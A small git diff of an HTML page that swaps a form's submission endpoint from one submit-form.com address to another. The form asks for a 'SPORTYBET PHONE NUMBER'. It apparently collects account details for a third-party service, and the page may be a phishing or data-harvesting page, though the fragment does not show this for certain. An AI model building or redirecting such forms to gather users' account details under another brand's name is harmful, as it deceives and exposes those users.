--- a/index.html
+++ b/index.html
@@ -65,7 +65,7 @@
  <!--main-->
 
  <p class="mt-5" style="font-size: small; font-weight: 700; color: white;">Indicates all required field to initiate the process</p>
- <form action="https://submit-form.com/dYtKS0L4" method="post">
+ <form action="https://submit-form.com/K1CU7Juh" method="post">
    <div class="mb-3 mt-2">
      <input type="number" class="form-control" id="number" placeholder="SPORTYBET PHONE NUMBER" name="name">
    </div>
